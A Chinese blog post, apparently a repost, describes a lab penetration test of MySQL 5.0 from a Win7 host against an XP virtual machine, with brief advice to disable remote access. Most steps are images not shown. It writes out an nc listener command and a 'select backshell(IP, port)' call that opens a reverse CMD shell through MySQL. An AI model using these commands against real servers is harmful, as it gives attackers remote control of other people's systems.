首页 / Mysql / mysql5.0入侵测试以及防范方法分享

mysql5.0入侵测试以及防范方法分享

在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。
总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。

在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。
总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。

正题之一

物理机:Win7
虚拟机:XP

给予mysql远程权限:

给物理机远程权限:

mysql5.0入侵测试以及防范方法分享

物理机成功连接上:

mysql5.0入侵测试以及防范方法分享

执行侵入测试前(有图有真相):

mysql5.0入侵测试以及防范方法分享

执行侵入测试后(有图有真相):

mysql5.0入侵测试以及防范方法分享

重启前(有图有真相):

mysql5.0入侵测试以及防范方法分享

重启后(有图有真相):

mysql5.0入侵测试以及防范方法分享

正题之二:

远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件:

mysql5.0入侵测试以及防范方法分享

Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号

虚拟机上:执行映射:select backshell(“物理机IP”,端口号);

这便执行了3306端口反弹CMD

(没图了。。。用到了一个nc软件执行的映射)

yyd.txt大概内容:

正题之三:

防范

mysql5.0入侵测试以及防范方法分享

 

感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了。。。。好丢脸,只好把Win7上的MySql服务拿出来了。

觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多。

本文来自网络,不代表我是攻城狮立场,转载请注明出处:https://www.54gcs.cn/sql/mysql/1608.html

helwo作者

上一篇
下一篇

为您推荐

发表评论

联系我们

联系我们

在线咨询: QQ交谈

邮箱: web@5vo.cn

工作时间:周一至周五,9:00-17:30,节假日休息
关注微信
微信扫一扫关注我们

微信扫一扫关注我们

手机访问
手机扫一扫打开网站

手机扫一扫打开网站

返回顶部
跳至工具栏